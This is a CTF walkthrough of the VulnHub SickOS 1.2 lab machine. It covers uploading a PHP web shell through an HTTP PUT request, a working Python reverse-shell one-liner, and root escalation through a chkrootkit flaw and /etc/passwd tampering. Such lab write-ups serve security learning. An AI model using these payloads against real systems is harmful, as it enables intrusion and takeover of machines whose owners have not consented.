CTF Walkthroughs, VulnHub

VulnHub – SickOS 1.2 Walkthrough

Introduction

This is a Linux box that involved exploiting the PUT http method to upload a PHP script through which a reverse shell can be obtained, and then using a known vulnerability in the chkrootkit program to escalate to root.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions
  • -Pn to skip the host discovery phase, as some hosts will not respond to ping requests
  • -oA to save the output in all formats available

Enumerating Port HTTP

When accessing the web server, the following page is displayed:

The source code does not have anything useful

The next step is to run a scan to find hidden files or directories using Wfuzz, with the following flags:

  • -w to specify the word list to use
  • –hc to exclude certain response codes
  • specifying the URL to scan, using FUZZ to indicate which part to fuzz

It looks like the “/test” entry takes to a lighttpd 1.4.28 webserver

After searching on SearchSploit it looks like no known exploits are available

The other entries are forbidden:

When checking the available methods through curl, the PUT method is available. This could be used to upload a reverse shell.

curl -v -X OPTIONS 10.10.10.131/test

Exploiting file upload via PUT request

Using curl to upload a PHP file containing the following code which will allow us to remotely execute code:

curl -v -X PUT -d '<?php echo system($_REQUEST['cmd']);?>' http://10.10.131/test/stef.php

When accessing the file, this allows to remotely execute commands through the “cmd” parameter:

The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Executing a python reverse shell through the cmd parameter:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.131",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Received a callback and established a reverse shell connection to the host:

Privilege Escalation

When inspecting the cron jobs on the machine, “chkrootkit” stands out:

Chkrootkit is a common Unix based program intended to help system administrators check their system for known rootkits.
Using SearchSploit to find known vulnerabilities in chkrootkit

Checking the chkroot version on the box – it matches the one in the exploit

Having a look at the exploit, it looks like the slapper function is expecting a file (in file_port) and if left empty, chkrootkit will simply execute as root all files with a name of “update”, as no quotation marks were specified in this variable’s path:

Below it lists the steps required to exploit this vulnerability:

Created a quick bash script to change the permissions of the /etc/passwd file

A new root user can be created by adding a new line to the /etc/passwd file. The steps required are the following:

  • Reading a few lines from the /etc/passwd file to verify the format
  • Generating a new password hash using openssl
  • Adding a new line to the /etc/passwd file, replacing the “x” with the previously created password hash

This could not be achieved with the sed command as the current user did not have permission to write a temporary file in the /etc folder. In this scenario I decided to instead replace the user’s root password.

This can be done using awk or echo, as shown below:

Logging in using SSH as the newly created user:

Conclusion

This was a really fun box, although the initial exploitation process wasn’t that hard it is definitely not something you see every day. What I liked most was the vulnerability in the chkrootkit tool, as this rootkit detection tool is something you see quite often in Linux and not something you’d expect to carry such a critical vulnerability.